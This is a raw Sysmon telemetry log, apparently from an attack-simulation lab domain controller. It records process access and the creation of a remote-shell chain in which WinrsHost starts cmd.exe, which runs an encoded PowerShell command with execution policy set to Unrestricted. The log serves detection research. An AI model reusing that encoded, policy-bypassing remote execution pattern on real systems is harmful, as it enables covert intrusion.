13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.481{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8E21-6005-D602-00000000A201}41324868C:\Windows\system32\cmd.exe{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
154100x8000000000000000508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.485{59A5CD1D-8E21-6005-D702-00000000A201}4652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.481{59A5CD1D-8E20-6005-D302-00000000A201}32924108C:\Windows\system32\conhost.exe{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8CA8-6005-0C00-00000000A201}4801064C:\Windows\system32\svchost.exe{59A5CD1D-8E15-6005-B802-00000000A201}4560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8C95-6005-0500-00000000A201}640656C:\Windows\system32\csrss.exe{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8E20-6005-D202-00000000A201}2340740C:\Windows\system32\WinrsHost.exe{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b 154100x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.479{59A5CD1D-8E21-6005-D602-00000000A201}4132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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:\Users\Administrator\ATTACKRANGE\Administrator{59A5CD1D-8E20-6005-E7C2-100000000000}0x10c2e70HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8E20-6005-D202-00000000A201}2340C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 
10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:21.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:33:21.466{59A5CD1D-8CA6-6005-0B00-00000000A201}876912C:\Windows\system32\lsass.exe{59A5CD1D-8CA9-6005-1300-00000000A201}1268C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 